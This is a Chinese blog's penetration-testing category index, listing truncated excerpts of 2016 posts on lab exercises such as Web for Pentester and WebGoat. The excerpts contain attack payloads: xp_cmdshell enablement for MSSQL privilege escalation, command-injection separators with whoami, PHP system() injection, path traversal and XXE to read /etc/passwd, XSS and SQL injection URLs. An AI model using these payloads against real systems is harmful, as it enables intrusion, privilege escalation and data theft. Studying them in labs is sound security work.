随笔分类 -  01-渗透测试

摘要:SA提权笔记: EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE; Exec master.dbo.xp_cm 阅读全文
posted @ 2016-11-12 19:04 Bypass 阅读(390) 评论(0) 推荐(0)
摘要:网络上找到的在sqlplus中执行cmd的一些命令,主要有四种方法,这边都做了一下测试,这里做一下记录: 测试环境:window2003+Oracle 11.2.0.1.0 第一种方法: 最简单的执行cmd命令方法,但执行的本机的cmd命令,非数据库系统的cmd命令,故和本机打开cmd命令一样,貌似 阅读全文
posted @ 2016-10-31 21:01 Bypass 阅读(12025) 评论(0) 推荐(0)
摘要:一直想摸索一下orcl提权的方式,今天测试了一下10g,可以成功提权。 C:\wmpub>sqlplus scott/tiger@orcl SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 10月 31 07:41:29 2016 Copyright 阅读全文
posted @ 2016-10-31 15:54 Bypass 阅读(866) 评论(0) 推荐(0)
摘要:SQL> select * from session_privs; PRIVILEGE CREATE SESSION Oracle 10g web注入技巧 最后 欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 参考文章: http://psoug.org/articles/Hack 阅读全文
posted @ 2016-10-30 11:20 Bypass 阅读(2789) 评论(0) 推荐(0)
摘要:Webgoat 分为简单版和开发版,具体版本及安装方法详见:https://github.com/WebGoat/WebGoat 本机环境为:Windows+Tomcat,故下载war包,自动解压缩进行部署。 war 下载地址:https://github.com/WebGoat/WebGoat/r 阅读全文
posted @ 2016-10-18 14:04 Bypass 阅读(514) 评论(0) 推荐(0)
摘要:Tomcat中间件经常遇到的漏洞: 1、Tomcat默认存在一个管理后台,默认的管理地址是http://IP或域名:端口号/manager/html 2、Axis2默认口令安全漏洞,默认的管理地址是http://IP或域名:端口号/axis2/axis2-admin/ , 按照webservice的 阅读全文
posted @ 2016-08-25 09:39 Bypass 阅读(1060) 评论(0) 推荐(0)
摘要:XPath注入 XQuery注入 测试语句:'or '1'='1 利用工具: Xcat介绍 Xcat是python的命令行程序利用Xpath的注入漏洞在Web应用中检索XML文档 下载地址:https://github.com/orf/xcat 使用说明:http://xcat.readthedoc 阅读全文
posted @ 2016-08-20 13:31 Bypass 阅读(1048) 评论(0) 推荐(0)
摘要:XML实体注入漏洞 测试代码1:新建xmlget.php,复制下面代码 漏洞测试利用方式1:有回显,直接读取文件 LINUX: 读取passwd文件,需URL编码后执行。 windows: 读取文件、也可以读取到内容D盘的文件夹,形式如: file:///d:/ URL编码后可执行: http:// 阅读全文
posted @ 2016-08-18 19:51 Bypass 阅读(22243) 评论(0) 推荐(0)
摘要:SQLite 官网下载:www.sqlite.org/download.html sqlite管理工具:http://www.yunqa.de/delphi/products/sqlitespy/index sqlite_master隐藏表,具体内容如下: 字段:type/name/tbl_name 阅读全文
posted @ 2016-08-11 11:46 Bypass 阅读(10247) 评论(0) 推荐(0)
摘要:测试了一个网站是Sqlite数据库,还装有安全狗,绕过了防护,找到Payload,写了一个Python脚本来跑表,这里总结一下: 取得sqlite数据库里所有的表名 查询table,type 段是'table',name段是table的名字, so: select name from sqlite_ 阅读全文
posted @ 2016-08-11 00:22 Bypass 阅读(1882) 评论(0) 推荐(1)
摘要:example1: http://192.168.91.139/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20UserInfo%5B%3C%21EN 阅读全文
posted @ 2016-07-22 16:18 Bypass 阅读(603) 评论(0) 推荐(0)
摘要:Example 1 输入单引号,报错,得到物理路径 可通过../../../../etc/paaswd 读取敏感信息 可包含本地文件或远程文件 https://assets.pentesterlab.com/test_include.txt Example 2 加单引号,报错,可发现获取到的参数后面 阅读全文
posted @ 2016-07-22 15:57 Bypass 阅读(1901) 评论(1) 推荐(0)
摘要:命令执行漏洞 windows支持: | ping 127.0.0.1|whoami || ping 2 || whoami (哪条名令为真执行那条) & && ping 127.0.0.1&&whoami Linux支持: ; 127.0.0.1;whoami | 127.0.0.1|whoami 阅读全文
posted @ 2016-07-21 16:59 Bypass 阅读(1111) 评论(0) 推荐(0)
摘要:Example 1 http://192.168.106.154/codeexec/example1.php?name=".system('uname -a');// Example 2 http://192.168.106.154/codeexec/example2.php?order=id);} 阅读全文
posted @ 2016-07-21 16:58 Bypass 阅读(760) 评论(0) 推荐(0)
摘要:Example 1 http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd Example 2 http://192.168.106.154/dirtrav/example2.php?file= 阅读全文
posted @ 2016-07-21 16:41 Bypass 阅读(761) 评论(0) 推荐(0)
摘要:Example 1 http://192.168.91.139/xss/example1.php?name=hacker<script>alert('xss')</script> Example 2 http://192.168.91.139/xss/example2.php?name=hacker 阅读全文
posted @ 2016-07-21 16:39 Bypass 阅读(1143) 评论(0) 推荐(0)
摘要:Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/example1.php?name=root' and 1=1%23 http://192.168.9 阅读全文
posted @ 2016-07-21 15:13 Bypass 阅读(6475) 评论(0) 推荐(0)
摘要:web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。 官网:https://www.pentesterlab.com 下载地址:https://www.pentesterlab.com/exercises/web_for_pen 阅读全文
posted @ 2016-07-21 15:12 Bypass 阅读(4039) 评论(2) 推荐(0)
摘要:使用发包工具构造http请求包检测 以fiddler工具为例,构造如下图的请求包: 1 GET http://192.168.174.145/ HTTP/1.12 Host: 192.168.174.1453 Range: bytes=0-184467440737095516154 Connecti 阅读全文
posted @ 2016-07-07 14:37 Bypass 阅读(11452) 评论(0) 推荐(0)
摘要:一.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的 阅读全文
posted @ 2016-06-17 17:44 Bypass 阅读(735) 评论(1) 推荐(0)